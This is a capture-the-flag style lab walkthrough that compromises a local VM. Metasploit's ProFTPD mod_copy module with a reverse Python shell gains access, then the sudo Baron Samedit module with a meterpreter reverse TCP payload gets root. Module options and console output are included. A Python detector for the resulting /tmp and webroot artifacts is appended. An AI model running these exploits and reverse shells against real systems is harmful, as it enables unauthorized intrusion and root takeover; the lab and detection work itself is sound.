# Lab Setup
Download the image, import it into the hypervisor, and use NAT networking.
IP: 192.168.1.130
# Initial Reconnaissance
```
21/tcp open ftp
80/tcp open http
```
FTP does not accept anonymous or empty-password logins, and directory enumeration on port 80 turns up nothing sensitive.
With only two ports open, the next step is service fingerprinting:
```
21/tcp open ftp ProFTPD 1.3.5rc3
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
```
Looking up the ProFTPD version shows it has a known vulnerability, and Metasploit ships an exploit module for it.
# Exploitation
# proftpd_modcopy_exec
Metasploit takes it down directly:
```
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www/html yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_python):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The system shell to use
Exploit target:
Id Name
-- ----
0 ProFTPD 1.3.5
View the full module info with the info, or info -d command.
```
Run it and we get a shell.
# Privilege Escalation
Search for a privilege-escalation module:
```
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > search priv platform:linux ubuntu
```
Use entry number 62 from the results:
```
msf6 exploit(linux/local/sudo_baron_samedit) > show options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 2255 yes The listen port
Exploit target:
Id Name
-- ----
7 Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 192.168.1.129:2255
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: cmd
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.9.5 is a vulnerable build.
[*] Writing '/tmp/KZd7d.py' (2797 bytes) ...
[*] Writing '/tmp/libnss_tY8/0zE.so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 192.168.1.130
[+] Deleted /tmp/KZd7d.py
[+] Deleted /tmp/libnss_tY8/0zE.so.2
[+] Deleted /tmp/libnss_tY8
[*] Meterpreter session 2 opened (192.168.1.129:2255 -> 192.168.1.130:42417) at 2024-04-30 00:17:02 -0400
meterpreter > getuid
Server username: root
meterpreter >
```
That gives root directly.
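As an added detection example (not part of the original post), the following Python flags the file-system artifacts this walkthrough leaves behind: the FTP daemon writing a script into the webroot (the mod_copy module requires a writable SITEPATH), and the privilege-escalation module dropping a `.py` and a `libnss_*/*.so.2` under `/tmp` before deleting them. The one-line `user path` event format, the account names and the `x.php` file name are constructed assumptions; only the `/tmp` paths come from the Metasploit output above.

```python
import re

# Constructed file-creation events ("<user> <path>" per line); not real auditd output.
# The two /tmp paths are the ones the sudo_baron_samedit run above wrote and deleted.
SAMPLE_EVENTS = """\
proftpd /var/www/html/x.php
www-data /tmp/KZd7d.py
www-data /tmp/libnss_tY8/0zE.so.2
root /var/lib/apt/lists/lock
www-data /var/www/html/uploads/avatar.png
"""

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
WEBROOT = "/var/www/html/"          # SITEPATH from the module options
SCRIPT_EXT = (".py", ".sh", ".pl")
WEB_EXEC_EXT = (".php", ".phtml")

# Anything named like an NSS module (libnss_*.so, libnss_*/x.so.2, ...)
NSS_LIB = re.compile(r"libnss_.*\.so(\.\d+)?$")


def classify(user, path):
    """Return a reason string when the event matches one of the patterns, else None."""
    in_temp = path.startswith(WORLD_WRITABLE)
    # 1. NSS-looking shared object outside the system library directories
    if in_temp and NSS_LIB.search(path):
        return "nss-library-in-temp"
    # 2. Script dropped into a world-writable directory by a service account
    if in_temp and path.endswith(SCRIPT_EXT) and user != "root":
        return "script-in-temp"
    # 3. FTP daemon writing executable web content into the webroot (mod_copy pattern)
    if user == "proftpd" and path.startswith(WEBROOT) and path.endswith(WEB_EXEC_EXT):
        return "ftp-write-to-webroot"
    return None


def scan(events_text):
    """Run classify() over every event line and collect (reason, path) hits in order."""
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        user, path = line.split(maxsplit=1)
        reason = classify(user, path)
        if reason:
            hits.append((reason, path))
    return hits


if __name__ == "__main__":
    for reason, path in scan(SAMPLE_EVENTS):
        print(f"{reason:24} {path}")
```

A real deployment would feed this from auditd `PATH` records or a file-integrity monitor rather than a static list, but the three rules carry over unchanged.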
# Summary
Metasploit is the best!
I still need to write up a summary of Linux privilege-escalation techniques.